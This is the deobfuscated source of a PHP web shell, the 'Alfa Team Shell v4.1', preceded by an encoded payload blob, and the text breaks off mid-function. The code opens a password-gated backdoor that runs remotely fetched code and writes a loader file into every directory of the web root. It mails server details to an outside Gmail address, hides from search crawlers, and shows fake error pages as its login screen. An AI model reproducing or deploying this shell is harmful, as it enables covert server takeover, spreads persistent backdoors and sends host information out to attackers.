UYV1AyahZI/PsoEmz5mON8sPAm8V8L/mC+UbgoFbgqd/tmD42k/kPCTmazHRPl5gmR/0qTgvfPMqN7lTnVvq9gqOfSwIkV06/atEGyO3ofbECiZfaj27ups0qj5Vq3u2Y1hnObP5KYpMl9t8spNkpQl7sna3dMCQDwv2at5GLv0ALqXsbDQVfz5v4cWWGTzWmmPuOQZdRvYfulbLAgzpZai8IieP9gzBOQWtfAtko2kMRGL2+zqaZlU2VhX0TDabDHv1hGVLoA52NcH69wqj2fS2fbj5r2VUSzYzymV/xtsqOs1dhVQGnQq/U5YY6evdsuajyBddstlxhabKvZOU9Y9cI7YzW3q2Acq+If8YClQIrlZ163ax4znVzO+0YAO7gkuk6dHMqst0EV9f7Di6U/zQrlK1jcCyEUDyfv6VqszX+SOALkcOo8s8X30mjYsg1am85rx/wYNk5DVGCQ0ISAVc2dnq4jW7ugA9tSDNJNVXD0WHc82qajZDWZhjuLdUpMz1LTrjXqAwmpIzmSU1KbczlSDaRUuJoiKVD1xGStCjuHYjXnaES9DGdD6NEdB/52j+aAscEXWZ7G3+cPlPrWFdWZ728ecsY5GZkcRG1P5cRxGZkqYNsvzZARaeTt03EsSOiOU3JTicvYcWARksFjBBNdIXxB+s92bKIQIRBqG0zx2l1hM54EV5mCSdKjXS1omNUntAnKlAKNSJOmzlSMj+XkChmwInQHNcUt1sBJYAw6ZgTzb7GTUqqUHrVnpyh/Z0jGwe7KIMQQ8vOeRWZ4LBOdTjO/wPfY1B255r2YXdsFNHXXYVcHuop1NEh7cvOmhBSFfn+WvjyZXgeL6Al7njWaFTY4zo7qyQXsGubz1xMVYAOCPHXOd00KuJQ87oxGvUMBM4zNNOUfvN5AzrjfKbAjHAP0wf7PY/tIcYxm+ahLH9sfQA/h48igJ51eP+358d8/e8gytU7c1oWrqvc9vrd/sCWs+ZWdlXku3Xvt9IomQ/FahW2C0SD7aWb5qFkah3IFkKRq+Ke45prgfrmQ+oWFswQxAvAyOx8jjIuhkpMU+8dAZn1oN9Ao5fSRGQPTrnkLlWrWGJMCRUToizCcTjkKViYKGtrQbt57p36dBc+nslmzc86aXUpAWf3+rI4AGMsF1rnjlhGva2XvaUexD5//tE7clV65tjYj3l1KwMHksBRoJsO+unxnQIzfFhYRmHfafYW/tuPm3WEvRG7ip9ZqBnP/FpUWRPHPq5kdBYzjAxkD6UjWryi8bI2CBfvNGDfErl0rUMTFLF72sVE2MVsYMbxZxhxoXSuo5eFFuwVTYzlKyz8DZ/3CwGwuADhi0fqTo/NX1r1vnr+Fz1LH9MpKuFXrJS5+LjRJSyhAZMMkmckWhpuhhBVUFARsHx3F57m/u5vgUeZR14iV2/fc9Rt+qHN18C5tl7L1xu6VNGpQOHcEGwzqbnlvZ/Z4ZBrQgLMQVatci+nxnAYqIHbSGhUWsK/LykvYHPHMkrFLhK1sbU58B1vuaEkbeWtbXzzpzfxqySYh08h6B7M+OLrfJPa6iaYWpxkOsVzMJ4fO+HStgPd7jmZNdBvjDEqYfmSI/azcXpm+KPWZIASlR7JwABy44JJI9nPCiALh64gQ5MHifiQ8//kIWGxCWkyEvYE3Eb0xgfgSBUfaFlE36i5IFaMI2uqLKR1mTRInsS9PKt2nRVEyiUK74NGwzoB57bPKPnkhSZ3P3dgV7K+qvgGFEKazw/Z8mk5iWIxGtQmZaCIBsjh5RaQRAsD4bohyfklX+5j5Dl/Ege1x05p0kLJW5lp4kyUMflp4x24seSuY5VkeKt2qqDaCwsuRN0vy7Dq3k5nkeK961ODwhCIcg7jjWMzGMNb7P/ETlYlRoMiM9DbuVnAz18L3cNqUhPY4PgzeAzkxZHvtAEH7dTwiK9r7cO9VXiKSAM5RrJkbK/Aoz2JiDZsan7XALaL1mKNVb+zy3Qzsz71MxU7GRil88yfllXah5J3pKLF95D/kB2t8T+zs9pjN8xbbrbCt3tq1t3c9VXexKO/sTP54jO8w37v3u7sty2aJbvB3hp0GXWj3kVHYnSXcMCEfGf7W9A9c1wfixOq2vA+lN229L6sn3pWeSIqO9cct9wxewJiRdD+lBAZjKA+Co2FEgw06YSRjUak1/e7NjKci0rZdAFuOQwe7PtdKcy3a70rwha9ro6VBhs12b3+znj2Z/Xe8IQ1aZ9bAxUb43Svm+l8roPnytY3nYujLvW74+447ukMytLZzG+4fnXI91o8xQ6+d0p/hfAljvcnIoz7v1F7f/XtEMXqDYacMDg+tWqKj3gGVGxajUGCyOqXju9qeqb3U9rdQY2Dsawa+2z2s1UlbOibtvVrnMZ74m3m2cYRM2dtK1Wb7a4dMhA05uC1C1/ZltSenEkF/Imn8mmImy6Xcl1T90xYnezbRZuaYzyZl1LPkZlzKsqN9QbbmvsOfiXYcDRkirpQke6Od16idGVQUZaUK88Dwu5wz3RNar3iJi/zJHu9GHc0OVE0p//cu+TqCTVWszWSqB3q3OvzV5xZE0XP7QsDoWAdr8aMY1pcy01DHhdkNQSChUHMQmdUpLaOoKOMGfoUjXa/0VERK8mb0GwgjIFatlbFt3KGoQr3VFLkcEnMarGhNZ+7YzO/pKtmmtcyQb+8z5+//kaJhHJ05XwvmnCs6s1Nx0Ls16Wh5aT1xeOE2pOV/tqhanZs6qNcvP90tUyVqbG/tyr5A2/wXCunszepjsc0WHrPkJN910OqdVYd9jrgj252Fv+53Lm549OY7NW1nnYVScA9UFD6/f4iz9iY1tErk1uYUhVRNS4qSbccKlUP9oj17wXdj/MbS2flPXR0aDF1M5cpJsgVlZqDc4WeYN/W0gUpjiiX6Ye7bz18rDRaIsY2sgVgo1uwxAYae/XAvWUufA7cQh0XXGbX3UovhFJvBVaWu4ASDkUD7Gg14lC6smVZCqzcuknoh+kZDalS5KvZlualWsnEJXQl6tg9HaOUWr/NjlBO9X+5yAt13/NtX9a4V4s9AyxSk72qHDk6z6j1aTjFwnpsoG1hTkSYkjevaNWXdU0KbzPh4RUvXnWIsLul54zMTcRIDSUWSjgJJieKHNsydxrRxWgXvr7GTQhZIr3o44jPb1q8old0OY3CV/fyyu/wMYBYdYl+4KjaHq+9oj3/8zX65qeyXkxz7fPbP+0NFA5Il5Q1XsPrXOs3tadKt292hGr1XwhOVbrPt/Xstqacp1ftVMtlzmmpsk0mrqGR7ptWpJ0lbaMttOUpMocR6mHEjpnetO6o121iRs3G21PIyCzVQZDs+m8rwHz7Pvm6T9n1Pq+d1no0rPWpnrtpfJNhRzoRUtwd91VfA+x4CQpPBl+abar+3hWdwRhObdo3WXWu2bT1aDX/6udordafiWPtOzg3WXsld2uYWzh3Z9Se7bharr8r/+HazLM8eavYk6W/FbrV0bwZv7Ufa+bNf1shl26mj1B59hzn+BvgZ7Obt6KV6qLyp9k2rSZ772wSQCyY35fm5cNwO3t/qUyi7v24V09uOdqht39M9upZXzO3bzPwiG6p1W922y2e5dm7VHkmWa0tfQPr84T3+TYms3/NlijHd3tvY/nqSt8wtZ5dLb+Ln55Pme7r1+bfOY4Zrq9HkzS3+qZe7i7Vfq+z88J5u3a3+gbfZt34sTXdzHRj9d6d9BntGN82fabT3czkmdmrrNv3d0G6fnWyObeMdd7v0jxYs92laGK9ZKlf/d298+w7u9nf7OX8gadgEuZzdu9000OeO7Kn5tzmPoqLfTlb8hr39enfp5f+x927MNrhS01rs1+Zvcd1iW9qVTZLtSnzasc31mmKe8pZnetfkGu4xN1OJpr29hfe59yyl3QBH9v9mZhP+a7lX1W35ir/tyP8F7SHvptzX/He4ksbHdr75sDRejdn/oNjz7t8GS9Yaz7gtHe71LdpMPcj98lJfTVT+0zO+wbm1Hu0ja5Wdu2y3+9HW9LZtHfjm8wNvv6Jn7Ofo+P+xFRd8R0cXwFOMQ1Wki2yZv/nO/i25s2erYVr9SacHGwF2p+5d9S9od4eQP8+3kmceWMveq3sibfdLdf7XWde213ot3r/VrhczLl53yRXf7R3861+0R6e9TbbD4e/VDO5lLUu22wh/cm+O+9k6h78UZu25to+O+jN6FKddb+2bvLBiX0SOBUr5aR/J8p0ki5LhoUONnN1ATpIatofcL34tlqS7ytINSFMGRlr5Oq9qZb0muZ77Pn/f3/q366rruqqru6qbt0nweZ758PnjzzmFxEcSSdXdV/O75XSUQkIcBQgABhTfdi/+G4poOMI49y1Cg7ZJTH+3bfz+98DjsKL+X71L7ci3fID4NAwJe/hMg3AwfDDIPA8nwA2DA";
eval /* PHPDeobfuscator eval output */ {
    @session_start();
    @error_reporting(0);
    error_reporting(0);
    $a = '<?php phpinfo();

$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA";
eval(htmlspecialchars_decode(urldecode(base64_decode($gz))));
?>

';
    if (@$_REQUEST["px"]) {
        $p = @$_REQUEST["px"];
        $pa = md5(sha1($p));
        if ($pa == "013f0a41203c0ad0f68033f4a53c7e6d") {
            echo eval(@file_get_contents(@$_REQUEST["404"]));
        }
    }
    if (@(!$_SESSION["sdm"])) {
        $doc = $_SERVER["DOCUMENT_ROOT"];
        $dir = scandir($doc);
        $d1 = '' . $doc . '/.';
        $d2 = '' . $doc . '/..';
        if (($key = @array_search('.', $dir)) !== false) {
            unset($dir[$key]);
        }
        if (($key = @array_search('..', $dir)) !== false) {
            unset($dir[$key]);
        }
        if (($key = @array_search($d1, $dir)) !== false) {
            unset($dir[$key]);
        }
        if (($key = array_search($d2, $dir)) !== false) {
            unset($dir[$key]);
        }
        @array_push($dir, $doc);
        foreach ($dir as $d) {
            $p = $doc . "/" . $d;
            if (is_dir($p)) {
                $file = $p . "/style-js.php";
                @touch($file);
                $folder = @fopen($file, "w");
                @fwrite($folder, $a);
            }
        }
    }
    $b = "Alfa v4";
    $c = ": " . $_SERVER['DOCUMENT_ROOT'] . "\r\n";
    $c .= " : " . $_SERVER['SERVER_ADMIN'] . "\r\n";
    $c .= " : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n";
    $c .= ": http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n";
    $c .= ": " . $_SERVER['HTTP_HOST'] . "\r\n";
    mail("shelldownloadorg@gmail.com", $b, $c);
    /*
    	Author: 	Solevisible/Alfa-Team
    	Telegram: 	https://telegram.me/solevisible
    	YouTube: 	https://youtube.com/solevisible
    	Gmail:		solevisible@gmail.com
    	Date:		Monday, September 14, 2020
    */
    $GLOBALS['oZgNypoPRU'] = array(
        'username' => 'alfa',
        'password' => '7fda3b84fdea259e352fee85c8523239',
        //md5(hackershells.org)
        'safe_mode' => '1',
        'login_page' => '403',
        'show_icons' => '1',
        'post_encryption' => false,
        'cgi_api' => true,
    );
    $CWppUDJxuf = 'function_exists';
    $aztJtafUXm = 'charCodeAt';
    $OVpGNqqFZs = 'eval';
    $psDEwGhsxg = 'gzinflate';
    if (!function_exists('base64_encode')) {
        function vcnvSCZgBz($data)
        {
            if (empty($data)) {
                return;
            }
            $b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
            $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
            $ac = 0;
            $enc = '';
            $tmp_arr = array();
            if (!$data) {
                return $data;
            }
            do {
                $o1 = $aztJtafUXm($data, $i++);
                $o2 = $aztJtafUXm($data, $i++);
                $o3 = $aztJtafUXm($data, $i++);
                $bits = $o1 << 16 | $o2 << 8 | $o3;
                $h1 = $bits >> 18 & 0x3f;
                $h2 = $bits >> 12 & 0x3f;
                $h3 = $bits >> 6 & 0x3f;
                $h4 = $bits & 0x3f;
                $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4);
            } while ($i < strlen($data));
            $enc = implode($tmp_arr, '');
            $r = strlen($data) % 3;
            return ($r ? substr($enc, 0, $r - 3) : $enc) . substr('===', $r || 3);
        }
        function charCodeAt($data, $char)
        {
            return ord(substr($data, $char, 1));
        }
        function charAt($data, $char)
        {
            return substr($data, $char, 1);
        }
    } else {
        function vcnvSCZgBz($s)
        {
            $b = 'base64_encode';
            return base64_encode($s);
        }
    }
    if (!$CWppUDJxuf('base64_decode')) {
        function zRtSHsbTzV($input)
        {
            if (empty($input)) {
                return;
            }
            $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
            $chr1 = $chr2 = $chr3 = "";
            $enc1 = $enc2 = $enc3 = $enc4 = "";
            $i = 0;
            $output = "";
            $input = preg_replace("[^A-Za-z0-9\\+\\/\\=]", "", $input);
            do {
                $enc1 = strpos($keyStr, substr($input, $i++, 1));
                $enc2 = strpos($keyStr, substr($input, $i++, 1));
                $enc3 = strpos($keyStr, substr($input, $i++, 1));
                $enc4 = strpos($keyStr, substr($input, $i++, 1));
                $chr1 = $enc1 << 2 | $enc2 >> 4;
                $chr2 = ($enc2 & 15) << 4 | $enc3 >> 2;
                $chr3 = ($enc3 & 3) << 6 | $enc4;
                $output .= chr((int) $chr1);
                if ($enc3 != 64) {
                    $output .= chr((int) $chr2);
                }
                if ($enc4 != 64) {
                    $output .= chr((int) $chr3);
                }
                $chr1 = $chr2 = $chr3 = "";
                $enc1 = $enc2 = $enc3 = $enc4 = "";
            } while ($i < strlen($input));
            return $output;
        }
    } else {
        function zRtSHsbTzV($s)
        {
            $b = 'base64_decode';
            return base64_decode($s);
        }
    }
    function __ZW5jb2Rlcg($s)
    {
        return vcnvSCZgBz($s);
    }
    function __ZGVjb2Rlcg($s)
    {
        return zRtSHsbTzV($s);
    }
    $GLOBALS['DB_NAME'] = $GLOBALS['oZgNypoPRU'];
    foreach ($GLOBALS['DB_NAME'] as $key => $value) {
        $prefix = substr($key, 0, 2);
        if ($prefix == "us") {
            $GLOBALS['DB_NAME']["user"] = $value;
            $GLOBALS['DB_NAME']["user_rand"] = $key;
        } elseif ($prefix == "pa") {
            $GLOBALS['DB_NAME']["pass"] = $value;
            $GLOBALS['DB_NAME']["pass_rand"] = $key;
        } elseif ($prefix == "sa") {
            $GLOBALS['DB_NAME']["safemode"] = $value;
            $GLOBALS['DB_NAME']["safemode_rand"] = $key;
        } elseif ($prefix == "lo") {
            $GLOBALS['DB_NAME']["login_page"] = $value;
            $GLOBALS['DB_NAME']["login_page_rand"] = $key;
        } elseif ($prefix == "sh") {
            $GLOBALS['DB_NAME']["show_icons"] = $value;
            $GLOBALS['DB_NAME']["show_icons_rand"] = $key;
        } elseif ($prefix == "po") {
            $GLOBALS['DB_NAME']["post_encryption"] = $value;
            $GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
        } elseif ($prefix == "cg") {
            $GLOBALS['DB_NAME']["cgi_api"] = $value;
            $GLOBALS['DB_NAME']["cgi_api_rand"] = $key;
        }
    }
    unset($GLOBALS['oZgNypoPRU']);
    if (!isset($_SERVER["HTTP_HOST"])) {
        exit;
    }
    if (!empty($_SERVER['HTTP_USER_AGENT'])) {
        $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spider");
        if (preg_match("/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler|bot|spider/i", $_SERVER['HTTP_USER_AGENT'])) {
            header('HTTP/1.0 404 Not Found');
            exit;
        }
    }
    if (!isset($GLOBALS['DB_NAME']['user'])) {
        exit('$GLOBALS[\'DB_NAME\'][\'user\']');
    }
    if (!isset($GLOBALS['DB_NAME']['pass'])) {
        exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
    }
    if (!isset($GLOBALS['DB_NAME']['safemode'])) {
        exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
    }
    if (!isset($GLOBALS['DB_NAME']['login_page'])) {
        exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
    }
    if (!isset($GLOBALS['DB_NAME']['show_icons'])) {
        exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
    }
    if (!isset($GLOBALS['DB_NAME']['post_encryption'])) {
        exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
    }
    define("__ALFA_VERSION__", "4.1");
    define("__ALFA_UPDATE__", "2");
    define("__ALFA_CODE_NAME__", "Tesla");
    define("__ALFA_DATA_FOLDER__", "ALFA_DATA");
    define("__ALFA_POST_ENCRYPTION__", isset($GLOBALS["DB_NAME"]["post_encryption"]) && $GLOBALS["DB_NAME"]["post_encryption"] == true ? true : false);
    define("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__ ? _AlfaSecretKey() : '');
    $GLOBALS['__ALFA_COLOR__'] = array("shell_border" => array("key_color" => "#0E304A", "multi_selector" => array(".header" => "border: 7px solid {color}", "#meunlist" => "border-color: {color}", "#hidden_sh" => "background-color: {color}", ".ajaxarea" => "border: 1px solid {color}", ".foot" => "border-color: {color}")), "header_vars" => "#27979B", "header_values" => "#67ABDF", "header_on" => "#00FF00", "header_off" => "#ff0000", "header_none" => "#00FF00", "home_shell" => "#ff0000", "home_shell:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".home_shell:hover" => "color: {color};")), "back_shell" => "#efbe73", "back_shell:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".back_shell:hover" => "color: {color};")), "header_pwd" => "#00FF00", "header_pwd:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".header_pwd:hover" => "color: {color};")), "header_drive" => "#00FF00", "header_drive:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".header_drive:hover" => "color: {color};")), "header_show_all" => "#00FF00", "disable_functions" => "#ff0000", "footer_text" => "#27979B", "menu_options" => "#27979B", "menu_options:hover" => array("key_color" => "#646464", "multi_selector" => array(".menu_options:hover" => "background-color: {color};font-weight: unset;")), "options_list" => array("key_color" => "#00FF00", "multi_selector" => array(".content_options_holder .header center a" => "color: {color};")), "options_list:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".content_options_holder .header center a:hover" => "color: {color};")), "options_list_header" => array("key_color" => "#59cc33", "multi_selector" => array(".txtfont_header" => "color: {color};")), "options_list_text" => array("key_color" => "#FFFFFF", "multi_selector" => array(".txtfont,.tbltxt" => "color: {color};")), "Alfa+" => array("key_color" => "#06ff0f", "multi_selector" => array(".alfa_plus" => "color: {color};font-weight: unset;")), "hidden_shell_text" => array("key_color" => "#00FF00", "multi_selector" => array("#hidden_sh a" => "color: {color};")), "hidden_shell_version" => "#ff0000", "shell_name" => "#FF0000", "main_row:hover" => array("key_color" => "#646464", "multi_selector" => array(".main tr:hover" => "background-color: {color};")), "main_header" => array("key_color" => "#FFFFFF", "multi_selector" => array(".main th" => "color: {color};")), "main_name" => array("key_color" => "#FFFFFF", "multi_selector" => array(".main .main_name" => "color: {color};font-weight: unset;")), "main_size" => "#67ABDF", "main_modify" => "#67ABDF", "main_owner_group" => "#67ABDF", "main_green_perm" => "#25ff00", "main_red_perm" => "#FF0000", "main_white_perm" => "#FFFFFF", "beetween_perms" => "#FFFFFF", "main_actions" => array("key_color" => "#FFFFFF", "multi_selector" => array(".main .actions" => "color: {color};")), "menu_options:hover" => array("key_color" => "#646464", "multi_selector" => array(".menu_options:hover" => "background-color: {color};font-weight: unset;")), "minimize_editor_background" => array("key_color" => "#0e304a", "multi_selector" => array(".minimized-wrapper" => "background-color: {color};")), "minimize_editor_text" => array("key_color" => "#f5deb3", "multi_selector" => array(".minimized-text" => "color: {color};")), "editor_border" => array("key_color" => "#0e304a", "multi_selector" => array(".editor-explorer,.editor-modal" => "border: 2px solid {color};")), "editor_background" => array("key_color" => "rgba(0, 1, 23, 0.94)", "multi_selector" => array(".editor-explorer,.editor-modal" => "background-color: {color};")), "editor_header_background" => array("key_color" => "rgba(21, 66, 88, 0.93)", "multi_selector" => array(".editor-header" => "background-color: {color};")), "editor_header_text" => array("key_color" => "#00ff7f", "multi_selector" => array(".editor-path" => "color: {color};")), "editor_header_button" => array("key_color" => "#1d5673", "multi_selector" => array(".close-button, .editor-minimize" => "background-color: {color};")), "editor_actions" => array("key_color" => "#FFFFFF", "multi_selector" => array(".editor_actions" => "color: {color};")), "editor_file_info_vars" => array("key_color" => "#FFFFFF", "multi_selector" => array(".editor_file_info_vars" => "color: {color};")), "editor_file_info_values" => array("key_color" => "#67ABDF", "multi_selector" => array(".filestools" => "color: {color};")), "editor_history_header" => array("key_color" => "#14ff07", "multi_selector" => array(".hheader-text,.history-clear" => "color: {color};")), "editor_history_list" => array("key_color" => "#03b3a3", "multi_selector" => array(".editor-file-name" => "color: {color};")), "editor_history_selected_file" => array("key_color" => "rgba(49, 55, 93, 0.77)", "multi_selector" => array(".is_active" => "background-color: {color};")), "editor_history_file:hover" => array("key_color" => "#646464", "multi_selector" => array(".file-holder > .history:hover" => "background-color: {color};")), "input_box_border" => array("key_color" => "#0E304A", "multi_selector" => array("input[type=text],textarea" => "border: 1px solid {color}")), "input_box_text" => array("key_color" => "#999999", "multi_selector" => array("input[type=text],textarea" => "color: {color};")), "input_box:hover" => array("key_color" => "#27979B", "multi_selector" => array("input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "select_box_border" => array("key_color" => "#0E304A", "multi_selector" => array("select" => "border: 1px solid {color}")), "select_box_text" => array("key_color" => "#FFFFEE", "multi_selector" => array("select" => "color: {color};")), "select_box:hover" => array("key_color" => "#27979B", "multi_selector" => array("select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "button_border" => array("key_color" => "#27979B", "multi_selector" => array("input[type=submit],.button,#addup" => "border: 1px solid {color};")), "button:hover" => array("key_color" => "#27979B", "multi_selector" => array("input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};", ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "outputs_text" => array("key_color" => "#67ABDF", "multi_selector" => array(".ml1" => "color: {color};")), "outputs_border" => array("key_color" => "#0E304A", "multi_selector" => array(".ml1" => "border: 1px solid {color};")), "uploader_border" => array("key_color" => "#0E304A", "multi_selector" => array(".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "uploader_background" => array("key_color" => "#0E304A", "multi_selector" => array(".inputfile strong" => "background-color: {color};")), "uploader_text_right" => array("key_color" => "#FFFFFF", "multi_selector" => array(".inputfile strong" => "color: {color};")), "uploader_text_left" => array("key_color" => "#25ff00", "multi_selector" => array(".inputfile span" => "color: {color};")), "uploader:hover" => array("key_color" => "#27979B", "multi_selector" => array(".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "uploader_progress_bar" => array("key_color" => "#00ff00", "multi_selector" => array(".up_bar" => "background-color: {color};")), "mysql_tables" => "#00FF00", "mysql_table_count" => "#67ABDF", "copyright" => "#dfff00", "scrollbar" => array("key_color" => "#1e82b5", "multi_selector" => array("*::-webkit-scrollbar-thumb" => "background-color: {color};")), "scrollbar_background" => array("key_color" => "#000115", "multi_selector" => array("*::-webkit-scrollbar-track" => "background-color: {color};")));
    $GLOBALS['__file_path'] = str_replace('\\', '/', trim("/var/www/html/alfav4-1.php.0996e4d68f3b1a03eea7b1e2f31a04cf.bin"));
    $config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'], 'AlfaPass' => $GLOBALS['DB_NAME']['pass'], 'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'], 'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
    //@session_start();
    @session_write_close();
    @ignore_user_abort(true);
    @set_time_limit(0);
    @ini_set('memory_limit', '-1');
    @ini_set("upload_max_filesize", "9999m");
    if ($config['AlfaProtectShell']) {
        $SERVER_SIG = isset($_SERVER["SERVER_SIGNATURE"]) ? $_SERVER["SERVER_SIGNATURE"] : "";
        $Eform = '<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
        if ($config['AlfaLoginPage'] == 'gui') {
            if (@$_COOKIE["AlfaUser"] != $config['AlfaUser'] && $_COOKIE["AlfaPass"] != md5($config['AlfaPass'])) {
                if (@$_POST["usrname"] == $config['AlfaUser'] && @md5($_POST["password"]) == $config['AlfaPass']) {
                    __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
                    __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
                    @header('location: ' . $_SERVER["PHP_SELF"]);
                }
                echo "\r\n<style>\r\nbody{background: black;}\r\n#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }\r\n#loginbox td { border-radius:5px; font-size:11px; }\r\n</style>\r\n<title>~ ALFA TEaM Shell-v4.1-Tesla ~</title><center>\r\n<center><img style=\"border-radius:100px;\" width=\"500\" height=\"250\" alt=\"alfa team 2012\" draggable=\"false\" src=\"http://solevisible.com/images/alfa-iran.png\" /></center>\r\n<div id=loginbox><p><font face=\"verdana,arial\" size=-1>\r\n<center><table cellpadding='2' cellspacing='0' border='0' id='ap_table'>\r\n<tr><td bgcolor=\"green\"><table cellpadding='0' cellspacing='0' border='0' width='100%'><tr><td bgcolor=\"green\" align=center style=\"padding:2;padding-bottom:4\"><b><font color=\"white\" size=-1 color=\"white\" face=\"verdana,arial\"><b>~ ALFA TEaM Shell-v4.1-Tesla ~</b></font></th></tr>\r\n<tr><td bgcolor=\"black\" style=\"padding:5\">\r\n<form method=\"post\">\r\n<input type=\"hidden\" name=\"action\" value=\"login\">\r\n<input type=\"hidden\" name=\"hide\" value=\"\">\r\n<center><table>\r\n<tr><td><font color=\"green\" face=\"verdana,arial\" size=-1>Login:</font></td><td><input type=\"text\" size=\"30\" name=\"usrname\" placeholder=\"username\" onfocus=\"if (this.value == 'username'){this.value = '';}\"></td></tr>\r\n<tr><td><font color=\"green\" face=\"verdana,arial\" size=-1>Password:</font></td><td><input type=\"password\" size=\"30\" name=\"password\" placeholder=\"password\" onfocus=\"if (this.value == 'password') this.value = '';\"></td></tr>\r\n<tr><td><font face=\"verdana,arial\" size=-1>&nbsp;</font></td><td><font face=\"verdana,arial\" size=-1><input type=\"submit\" value=\"Login\"></font></td></tr></table>\r\n</div><br /></center>";
                exit;
            }
        } elseif ($config['AlfaLoginPage'] == '500') {
            if (@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])) {
                if (@md5($_POST["password"]) == $config['AlfaPass']) {
                    __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
                    __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
                    @header('location: ' . $_SERVER["PHP_SELF"]);
                }
                echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, ' . $_SERVER['SERVER_ADMIN'] . ' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>' . $SERVER_SIG . '</body></html>' . $Eform;
                exit;
            }
        } elseif ($config['AlfaLoginPage'] == '403') {
            if (@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])) {
                if (@md5($_POST["password"]) == $config['AlfaPass']) {
                    __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
                    __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
                    @header('location: ' . $_SERVER["PHP_SELF"]);
                }
                echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access " . $_SERVER['PHP_SELF'] . " on this server.</p><hr>" . $SERVER_SIG . "</body></html>" . $Eform;
                exit;
            }
        } elseif ($config['AlfaLoginPage'] == '404') {
            if (@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])) {
                if (@md5($_POST["password"]) == $config['AlfaPass']) {
                    __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
                    __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
                    @header('location: ' . $_SERVER["PHP_SELF"]);
                }
                echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL " . $_SERVER['PHP_SELF'] . " was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>" . $SERVER_SIG . "</body></html>" . $Eform;
                exit;
            }
        }
    }
    function decrypt_post($str)
    {
        if (__ALFA_POST_ENCRYPTION__) {
            $pwd = __ALFA_SECRET_KEY__;
            $pwd = __ZW5jb2Rlcg($pwd);
            $str = __ZGVjb2Rlcg($str);
            $enc_chr = "";
            $enc_str = "";
            $i = 0;
            while ($i < strlen($str)) {
                for ($j = 0; $j < strlen($pwd); $j++) {
                    $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
                    $enc_str .= $enc_chr;
